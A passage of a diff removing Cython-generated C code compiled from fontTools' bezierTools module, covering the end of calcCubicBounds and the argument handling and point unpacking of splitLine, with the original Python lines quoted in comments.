PyObject_RichCompare(__pyx_8genexpr2__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - } - __pyx_t_13 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_13 < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - if (__pyx_t_13) { - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_8genexpr2__pyx_v_t))) __PYX_ERR(0, 437, __pyx_L23_error) - } - } - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_XDECREF(__pyx_8genexpr2__pyx_v_t); __pyx_8genexpr2__pyx_v_t = 0; - goto __pyx_L28_exit_scope; - __pyx_L23_error:; - __Pyx_XDECREF(__pyx_8genexpr2__pyx_v_t); __pyx_8genexpr2__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L28_exit_scope:; - } /* exit inner scope */ - __pyx_v_yRoots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":438 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] - * roots = xRoots + yRoots # <<<<<<<<<<<<<< - * - * points = [ - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_xRoots, __pyx_v_yRoots); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 438, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":446 - * ) - * for t in roots - * ] + [pt1, pt4] # <<<<<<<<<<<<<< - * return calcBounds(points) - * - */ - { /* enter inner scope */ - - /* "fontTools/misc/bezierTools.py":440 - * roots = xRoots + yRoots - * - * points = [ # <<<<<<<<<<<<<< - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 440, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":445 - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - * for t in roots # <<<<<<<<<<<<<< - * ] + [pt1, pt4] - * return calcBounds(points) - */ - __pyx_t_6 = __pyx_v_roots; __Pyx_INCREF(__pyx_t_6); - __pyx_t_11 = 0; - for (;;) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_6); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 445, __pyx_L31_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_5 = PyList_GET_ITEM(__pyx_t_6, __pyx_t_11); __Pyx_INCREF(__pyx_t_5); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 445, __pyx_L31_error) - #else - __pyx_t_5 = __Pyx_PySequence_ITEM(__pyx_t_6, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 445, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - __Pyx_XDECREF_SET(__pyx_8genexpr3__pyx_v_t, __pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":442 - * points = [ - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, # <<<<<<<<<<<<<< - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - */ - __pyx_t_5 = PyNumber_Multiply(__pyx_v_ax, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_5, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v_bx, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_v_cx, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_5, __pyx_v_dx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":443 - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, - * ay * t * t * t + by * t * t + cy * t + dy, # <<<<<<<<<<<<<< - * ) - * for t in roots - */ - __pyx_t_5 = PyNumber_Multiply(__pyx_v_ay, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_5, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v_by, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = PyNumber_Multiply(__pyx_v_cy, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_5 = PyNumber_Add(__pyx_t_3, __pyx_t_7); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = PyNumber_Add(__pyx_t_5, __pyx_v_dy); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":442 - * points = [ - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, # <<<<<<<<<<<<<< - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - */ - __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error); - __Pyx_GIVEREF(__pyx_t_7); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_7)) __PYX_ERR(0, 442, __pyx_L31_error); - __pyx_t_2 = 0; - __pyx_t_7 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_5))) __PYX_ERR(0, 440, __pyx_L31_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":445 - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - * for t in roots # <<<<<<<<<<<<<< - * ] + [pt1, pt4] - * return calcBounds(points) - */ - } - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_XDECREF(__pyx_8genexpr3__pyx_v_t); __pyx_8genexpr3__pyx_v_t = 0; - goto __pyx_L35_exit_scope; - __pyx_L31_error:; - __Pyx_XDECREF(__pyx_8genexpr3__pyx_v_t); __pyx_8genexpr3__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L35_exit_scope:; - } /* exit inner scope */ - - /* "fontTools/misc/bezierTools.py":446 - * ) - * for t in roots - * ] + [pt1, pt4] # <<<<<<<<<<<<<< - * return calcBounds(points) - * - */ - __pyx_t_6 = PyList_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 446, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 0, __pyx_v_pt1)) __PYX_ERR(0, 446, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_v_pt4); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 1, __pyx_v_pt4)) __PYX_ERR(0, 446, __pyx_L1_error); - __pyx_t_5 = PyNumber_Add(__pyx_t_1, __pyx_t_6); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 446, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_v_points = ((PyObject*)__pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":447 - * for t in roots - * ] + [pt1, pt4] - * return calcBounds(points) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_calcBounds); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 447, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_6))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_6); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_6, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_points}; - __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 447, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_ax3); - __Pyx_XDECREF(__pyx_v_ay3); - __Pyx_XDECREF(__pyx_v_bx2); - __Pyx_XDECREF(__pyx_v_by2); - __Pyx_XDECREF(__pyx_v_xRoots); - __Pyx_XDECREF(__pyx_v_yRoots); - __Pyx_XDECREF(__pyx_v_roots); - __Pyx_XDECREF(__pyx_v_points); - __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_t); - __Pyx_XDECREF(__pyx_8genexpr2__pyx_v_t); - __Pyx_XDECREF(__pyx_8genexpr3__pyx_v_t); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_25splitLine(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_24splitLine, "splitLine(pt1, pt2, where, isHorizontal)\nSplit a line at a given coordinate.\n\n Args:\n pt1: Start point of line as 2D tuple.\n pt2: End point of line as 2D tuple.\n where: Position at which to split the line.\n isHorizontal: Direction of the ray splitting the line. If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two line segments (each line segment being two 2D tuples)\n if the line was successfully split, or a list containing the original\n line.\n\n Example::\n\n >>> printSegments(splitLine((0, 0), (100, 100), 50, True))\n ((0, 0), (50, 50))\n ((50, 50), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 100, True))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, True))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, False))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((100, 0), (0, 0), 50, False))\n ((100, 0), (50, 0))\n ((50, 0), (0, 0))\n >>> printSegments(splitLine((0, 100), (0, 0), 50, True))\n ((0, 100), (0, 50))\n ((0, 50), (0, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_25splitLine = {"splitLine", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_25splitLine, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_24splitLine}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_25splitLine(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_where = 0; - PyObject *__pyx_v_isHorizontal = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitLine (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_where,&__pyx_n_s_isHorizontal,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, 1); __PYX_ERR(0, 450, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_where)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, 2); __PYX_ERR(0, 450, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_isHorizontal)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 450, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, 3); __PYX_ERR(0, 450, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitLine") < 0)) __PYX_ERR(0, 450, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_where = values[2]; - __pyx_v_isHorizontal = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitLine", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 450, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitLine", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_24splitLine(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_where, __pyx_v_isHorizontal); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_24splitLine(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal) { - PyObject *__pyx_v_pt1x = NULL; - PyObject *__pyx_v_pt1y = NULL; - PyObject *__pyx_v_pt2x = NULL; - PyObject *__pyx_v_pt2y = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_t = NULL; - PyObject *__pyx_v_midPt = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitLine", 1); - - /* "fontTools/misc/bezierTools.py":486 - * ((0, 50), (0, 0)) - * """ - * pt1x, pt1y = pt1 # <<<<<<<<<<<<<< - * pt2x, pt2y = pt2 - * - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt1))) || (PyList_CheckExact(__pyx_v_pt1))) { - PyObject* sequence = __pyx_v_pt1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 486, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 486, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 486, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 486, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 486, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 486, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_pt1x = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_pt1y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":487 - * """ - * pt1x, pt1y = pt1 - * pt2x, pt2y = pt2 # <<<<<<<<<<<<<< - * - * ax = pt2x - pt1x - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt2))) || (PyList_CheckExact(__pyx_v_pt2))) { - PyObject* sequence = __pyx_v_pt2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 487, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 487, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 487, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 487, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 487, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - 